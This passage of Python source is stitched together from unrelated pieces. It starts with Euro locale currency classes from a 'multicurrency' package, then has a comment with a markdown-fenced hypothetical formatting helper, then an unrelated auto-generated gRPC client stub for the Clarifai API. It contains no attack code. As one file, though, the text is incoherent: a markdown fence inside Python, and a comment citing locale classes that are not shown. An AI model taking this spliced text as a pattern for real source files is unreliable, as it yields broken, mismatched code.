symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroPT':
"""Class creator.
Returns:
EuroPT: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='PT€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSM(Currency):
"""EuroSM currency representation.
Simple usage example:
>>> from multicurrency import EuroSM
>>> eurosm = EuroSM(
... amount=123456.789)
>>> print(eurosm)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSM':
"""Class creator.
Returns:
EuroSM: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SM€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSK(Currency):
"""EuroSK currency representation.
Simple usage example:
>>> from multicurrency import EuroSK
>>> eurosk = EuroSK(
... amount=123456.789)
>>> print(eurosk)
123 456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ' '.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '\u202F',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSK':
"""Class creator.
Returns:
EuroSK: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SK€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroSI(Currency):
"""EuroSI currency representation.
Simple usage example:
>>> from multicurrency import EuroSI
>>> eurosi = EuroSI(
... amount=123456.789)
>>> print(eurosi)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroSI':
"""Class creator.
Returns:
EuroSI: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='SI€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroES(Currency):
"""EuroES currency representation.
Simple usage example:
>>> from multicurrency import EuroES
>>> euroes = EuroES(
... amount=123456.789)
>>> print(euroes)
123.456,79 €
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to ','.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to '.'.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ' '.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to False.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = ',',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = '.',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = False,
symbol_separator: Optional[str] = '\u00A0',
**other) -> 'EuroES':
"""Class creator.
Returns:
EuroES: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='ES€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
class EuroVA(Currency):
"""EuroVA currency representation.
Simple usage example:
>>> from multicurrency import EuroVA
>>> eurova = EuroVA(
... amount=123456.789)
>>> print(eurova)
€123,456.79
For more details see `multicurrency.currency.Currency`.
Args:
amount (Union[int, float, Decimal]): Represented value.
decimal_places (int, optional): Number of decimal places for the
currency representation. Defaults to 2.
decimal_sign (str, optional): Decimal symbol. Defaults to '.'.
grouping_places (int, optional): Number of digits for grouping.
Defaults to 3.
grouping_sign (str, optional): Grouping symbol. Defaults to ','.
international (bool, optional): Identifies the currency using
the 'currency' value instead of the 'symbol'. Defaults to
False.
symbol_separator (str, optional): Separation between the symbol
and the value. Defaults to ''.
symbol_ahead (bool, optional): True if symbol goes ahead of the
value. False otherwise. Defaults to True.
"""
__slots__ = []
def __new__( # pylint: disable=signature-differs,disable=unused-argument
cls,
amount: Union[int, float, Decimal],
decimal_places: Optional[int] = 2,
decimal_sign: Optional[str] = '.',
grouping_places: Optional[int] = 3,
grouping_sign: Optional[str] = ',',
international: Optional[bool] = False,
symbol_ahead: Optional[bool] = True,
symbol_separator: Optional[str] = '',
**other) -> 'EuroVA':
"""Class creator.
Returns:
EuroVA: new object.
"""
return Currency.__new__(
cls,
amount=amount,
alpha_code='EUR',
numeric_code='978',
symbol='€',
symbol_separator=symbol_separator,
symbol_ahead=symbol_ahead,
localized_symbol='VA€',
decimal_places=decimal_places,
decimal_sign=decimal_sign,
grouping_places=grouping_places,
grouping_sign=grouping_sign,
convertion='',
international=international)
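# The nine locale variants above differ only in the formatting arguments they
# forward to Currency.__new__. As a rough, self-contained sketch of how those
# arguments interact, the helper below reproduces the docstring outputs.
# NOTE: format_amount is a hypothetical illustration, not part of
# multicurrency, and it hard-codes 3-digit grouping (the grouping_places
# default).

```python
def format_amount(amount, decimal_places=2, decimal_sign=',',
                  grouping_sign='.', symbol='\u20ac', symbol_ahead=False,
                  symbol_separator='\u00a0'):
    """Hypothetical sketch of the locale formatting the Euro* classes set up."""
    quantized = f'{amount:,.{decimal_places}f}'       # e.g. '123,456.79'
    integer, _, fraction = quantized.partition('.')
    integer = integer.replace(',', grouping_sign)     # swap in locale grouping
    value = (integer + decimal_sign + fraction) if decimal_places else integer
    if symbol_ahead:                                  # EuroNL/EuroPT/EuroVA style
        return symbol + symbol_separator + value
    return value + symbol_separator + symbol          # EuroME/EuroSM/... style
```

# EuroVA's docstring example corresponds to
# format_amount(123456.789, decimal_sign='.', grouping_sign=',',
#               symbol_ahead=True, symbol_separator='').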
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from clarifai.rest.grpc.proto.clarifai.api import code_pb2 as proto_dot_clarifai_dot_api_dot_code__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_graph_pb2 as proto_dot_clarifai_dot_api_dot_concept__graph__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_language_pb2 as proto_dot_clarifai_dot_api_dot_concept__language__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_pb2 as proto_dot_clarifai_dot_api_dot_concept__pb2
from clarifai.rest.grpc.proto.clarifai.api import concept_reference_pb2 as proto_dot_clarifai_dot_api_dot_concept__reference__pb2
from clarifai.rest.grpc.proto.clarifai.api import input_pb2 as proto_dot_clarifai_dot_api_dot_input__pb2
from clarifai.rest.grpc.proto.clarifai.api import model_pb2 as proto_dot_clarifai_dot_api_dot_model__pb2
from clarifai.rest.grpc.proto.clarifai.api import model_version_pb2 as proto_dot_clarifai_dot_api_dot_model__version__pb2
from clarifai.rest.grpc.proto.clarifai.api import output_pb2 as proto_dot_clarifai_dot_api_dot_output__pb2
from clarifai.rest.grpc.proto.clarifai.api import search_pb2 as proto_dot_clarifai_dot_api_dot_search__pb2
from clarifai.rest.grpc.proto.clarifai.api.status import status_pb2 as proto_dot_clarifai_dot_api_dot_status_dot_status__pb2
from clarifai.rest.grpc.proto.clarifai.api import subscription_pb2 as proto_dot_clarifai_dot_api_dot_subscription__pb2
from clarifai.rest.grpc.proto.clarifai.api import visualization_pb2 as proto_dot_clarifai_dot_api_dot_visualization__pb2
from clarifai.rest.grpc.proto.clarifai.api import vocab_pb2 as proto_dot_clarifai_dot_api_dot_vocab__pb2
from clarifai.rest.grpc.proto.clarifai.api import workflow_pb2 as proto_dot_clarifai_dot_api_dot_workflow__pb2
class V2Stub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetConceptCounts = channel.unary_unary(
'/clarifai.api.V2/GetConceptCounts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptCountsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptCountResponse.FromString,
)
self.GetConcept = channel.unary_unary(
'/clarifai.api.V2/GetConcept',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.SingleConceptResponse.FromString,
)
self.ListConcepts = channel.unary_unary(
'/clarifai.api.V2/ListConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.ListConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.PostConceptsSearches = channel.unary_unary(
'/clarifai.api.V2/PostConceptsSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.PostConcepts = channel.unary_unary(
'/clarifai.api.V2/PostConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.PatchConcepts = channel.unary_unary(
'/clarifai.api.V2/PatchConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PatchConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.GetVocab = channel.unary_unary(
'/clarifai.api.V2/GetVocab',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.GetVocabRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.SingleVocabResponse.FromString,
)
self.ListVocabs = channel.unary_unary(
'/clarifai.api.V2/ListVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.FromString,
)
self.PostVocabs = channel.unary_unary(
'/clarifai.api.V2/PostVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.FromString,
)
self.PatchVocabs = channel.unary_unary(
'/clarifai.api.V2/PatchVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PatchVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.FromString,
)
self.DeleteVocab = channel.unary_unary(
'/clarifai.api.V2/DeleteVocab',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.DeleteVocabs = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabs',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.ListVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/ListVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.PostVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/PostVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.DeleteVocabConcept = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabConcept',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.DeleteVocabConcepts = channel.unary_unary(
'/clarifai.api.V2/DeleteVocabConcepts',
request_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.GetConceptLanguage = channel.unary_unary(
'/clarifai.api.V2/GetConceptLanguage',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.GetConceptLanguageRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.SingleConceptLanguageResponse.FromString,
)
self.ListConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/ListConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.ListConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.FromString,
)
self.PostConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/PostConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PostConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.FromString,
)
self.PatchConceptLanguages = channel.unary_unary(
'/clarifai.api.V2/PatchConceptLanguages',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PatchConceptLanguagesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.FromString,
)
self.ListConceptReferences = channel.unary_unary(
'/clarifai.api.V2/ListConceptReferences',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.ListConceptReferencesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.MultiConceptReferenceResponse.FromString,
)
self.ListConceptRelations = channel.unary_unary(
'/clarifai.api.V2/ListConceptRelations',
request_serializer=proto_dot_clarifai_dot_api_dot_concept__graph__pb2.ListConceptRelationsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.FromString,
)
self.GetInputCount = channel.unary_unary(
'/clarifai.api.V2/GetInputCount',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputCountRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputCountResponse.FromString,
)
self.StreamInputs = channel.unary_unary(
'/clarifai.api.V2/StreamInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.StreamInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.FromString,
)
self.GetInput = channel.unary_unary(
'/clarifai.api.V2/GetInput',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputResponse.FromString,
)
self.ListInputs = channel.unary_unary(
'/clarifai.api.V2/ListInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.FromString,
)
self.PostInputs = channel.unary_unary(
'/clarifai.api.V2/PostInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.FromString,
)
self.PatchInputs = channel.unary_unary(
'/clarifai.api.V2/PatchInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PatchInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.FromString,
)
self.DeleteInput = channel.unary_unary(
'/clarifai.api.V2/DeleteInput',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.DeleteInputs = channel.unary_unary(
'/clarifai.api.V2/DeleteInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.PostModelOutputs = channel.unary_unary(
'/clarifai.api.V2/PostModelOutputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelOutputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_output__pb2.MultiOutputResponse.FromString,
)
self.PostModelFeedback = channel.unary_unary(
'/clarifai.api.V2/PostModelFeedback',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelFeedbackRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.GetModel = channel.unary_unary(
'/clarifai.api.V2/GetModel',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.FromString,
)
self.GetModelOutputInfo = channel.unary_unary(
'/clarifai.api.V2/GetModelOutputInfo',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.FromString,
)
self.ListModels = channel.unary_unary(
'/clarifai.api.V2/ListModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.ListModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.FromString,
)
self.PostModelsSearches = channel.unary_unary(
'/clarifai.api.V2/PostModelsSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.FromString,
)
self.PostModels = channel.unary_unary(
'/clarifai.api.V2/PostModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.FromString,
)
self.PatchModels = channel.unary_unary(
'/clarifai.api.V2/PatchModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.PatchModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.FromString,
)
self.DeleteModel = channel.unary_unary(
'/clarifai.api.V2/DeleteModel',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.DeleteModels = channel.unary_unary(
'/clarifai.api.V2/DeleteModels',
request_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.ListModelInputs = channel.unary_unary(
'/clarifai.api.V2/ListModelInputs',
request_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListModelInputsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.FromString,
)
self.GetModelVersion = channel.unary_unary(
'/clarifai.api.V2/GetModelVersion',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.FromString,
)
self.ListModelVersions = channel.unary_unary(
'/clarifai.api.V2/ListModelVersions',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.ListModelVersionsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.MultiModelVersionResponse.FromString,
)
self.PostModelVersions = channel.unary_unary(
'/clarifai.api.V2/PostModelVersions',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.FromString,
)
self.DeleteModelVersion = channel.unary_unary(
'/clarifai.api.V2/DeleteModelVersion',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.DeleteModelVersionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.GetModelVersionMetrics = channel.unary_unary(
'/clarifai.api.V2/GetModelVersionMetrics',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionMetricsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.FromString,
)
self.PostModelVersionMetrics = channel.unary_unary(
'/clarifai.api.V2/PostModelVersionMetrics',
request_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionMetricsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.FromString,
)
self.GetWorkflow = channel.unary_unary(
'/clarifai.api.V2/GetWorkflow',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.GetWorkflowRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.SingleWorkflowResponse.FromString,
)
self.ListWorkflows = channel.unary_unary(
'/clarifai.api.V2/ListWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.FromString,
)
self.ListPublicWorkflows = channel.unary_unary(
'/clarifai.api.V2/ListPublicWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListPublicWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.FromString,
)
self.PostWorkflows = channel.unary_unary(
'/clarifai.api.V2/PostWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.FromString,
)
self.PatchWorkflows = channel.unary_unary(
'/clarifai.api.V2/PatchWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PatchWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.FromString,
)
self.DeleteWorkflow = channel.unary_unary(
'/clarifai.api.V2/DeleteWorkflow',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.DeleteWorkflows = channel.unary_unary(
'/clarifai.api.V2/DeleteWorkflows',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.PostWorkflowResults = channel.unary_unary(
'/clarifai.api.V2/PostWorkflowResults',
request_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsResponse.FromString,
)
self.PostSearches = channel.unary_unary(
'/clarifai.api.V2/PostSearches',
request_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.MultiSearchResponse.FromString,
)
self.PostSearchFeedback = channel.unary_unary(
'/clarifai.api.V2/PostSearchFeedback',
request_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchFeedbackRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.FromString,
)
self.GetSubscription = channel.unary_unary(
'/clarifai.api.V2/GetSubscription',
request_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.GetSubscriptionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.FromString,
)
self.PostSubscription = channel.unary_unary(
'/clarifai.api.V2/PostSubscription',
request_serializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.PostSubscriptionRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_subscription__pb2.SingleSubscriptionResponse.FromString,
)
self.GetAppVisualization = channel.unary_unary(
'/clarifai.api.V2/GetAppVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetAppVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.FromString,
)
self.GetVisualization = channel.unary_unary(
'/clarifai.api.V2/GetVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.GetVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.FromString,
)
self.PostVisualization = channel.unary_unary(
'/clarifai.api.V2/PostVisualization',
request_serializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.PostVisualizationRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_visualization__pb2.SingleVisualizationResponse.FromString,
)
self.ListStatusCodes = channel.unary_unary(
'/clarifai.api.V2/ListStatusCodes',
request_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.ListStatusCodesRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.MultiStatusCodeResponse.FromString,
)
self.GetStatusCode = channel.unary_unary(
'/clarifai.api.V2/GetStatusCode',
request_serializer=proto_dot_clarifai_dot_api_dot_code__pb2.GetStatusCodeRequest.SerializeToString,
response_deserializer=proto_dot_clarifai_dot_api_dot_code__pb2.SingleStatusCodeResponse.FromString,
)
